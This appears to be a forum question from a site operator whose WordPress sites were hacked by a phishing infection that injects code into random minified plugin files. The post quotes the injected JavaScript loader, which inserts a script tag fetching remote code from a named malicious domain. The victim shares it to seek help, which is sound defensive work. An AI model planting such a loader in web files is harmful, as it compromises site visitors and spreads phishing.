8Ara
WP Phishing Malware: iglesiaelarca. Anyone experienced? [closed]
We got hacked by iglesiaelarca.com (don't open it, it's a malicious URL).
Our setup: DigitalOcean VPS, Apache, multiple domains & WP websites, Elementor Pro, hopefully safe plugins.
Known facts:
- It's phishing.
- The virus infects all the websites on our VPS.
- They like to play hide'n'seek. It randomly injects client files (mostly minified plugin files) with random code. (On one site it's jquery-migrate.min.js, on another site it's elementor-pro... just random)
This is the code injected right at the start of a compromised file:
;(function(b, r, f, c, m, j) {
m = r.createElement(f);
j = r.getElementsByTagName(f)[0];
m.async = 1;
m.src = c;
j.parentNode.insertBefore(m, j);
}
)(window, document, 'script', 'https://trademark.iglesiaelarca.com/OM34nkPvm/dc78KsD/rUvErvwrxWv5LuVK+ZvEU=');
Anyone experienced this kind of exploitation?
Will inform you about more findings.